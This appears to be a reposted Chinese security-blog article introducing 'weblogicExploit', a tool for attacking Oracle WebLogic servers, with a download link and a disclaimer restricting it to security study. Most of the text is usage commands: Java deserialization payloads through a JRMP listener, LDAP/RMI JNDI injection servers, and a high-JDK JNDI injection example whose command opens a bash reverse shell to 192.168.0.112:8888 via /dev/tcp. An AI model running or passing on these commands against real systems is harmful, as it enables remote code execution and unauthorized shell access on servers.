weblogic历史漏洞利用工具 -- weblogicExploit
2022-11-29 10:3:2 Author: 黑白之道(查看原文) 阅读量:11 收藏

一、工具介绍

工具部分代码借鉴前辈的weblogic_cmd,属于二次再造轮子,部分功能暂未完善,后续将继续往上加功能。

二、安装与使用
1、列出可控payloads
java -jar weblogic.jar -payloads
2、启动JRMPListener
java -jar weblogic.jar -Jport 8888 -payload cc6 -c calc.exe
3、启动LDAP/RMI
LDAPjava -jar weblogic.jar -jndistart -Jport 8888 -jndildap -codeurl http://127.0.0.1/#wlc618RMIjava -jar weblogic.jar -jndistart -Jport 8888 -jndirmi -codeurl http://127.0.0.1/
4、高版本jndi注入 ldap
java -jar weblogic\ tools.jar -jndistart -Jport 9922 -jndildap -highjdk -os linux -c 'open /System/Applications/Calculator.app'

java -jar weblogic\ tools.jar -jndistart -Jport 9922 -jndildap -highjdk -os linux -c 'bash -i >& /dev/tcp/192.168.0.112/8888 0>&1'
三、下载地址:
https://github.com/8ypass/weblogicExploit

文章来源:系统安全运维

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文

END

多一个点在看多一条小鱼干


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650557239&idx=4&sn=e0c1976b014adc55f22607b04dc2335c&chksm=83bd2ed3b4caa7c58cedf5474b84e940a9f827a2fde7105bebf2df096f56ad0acf86e61bbcae#rd
如有侵权请联系:admin#unsafe.sh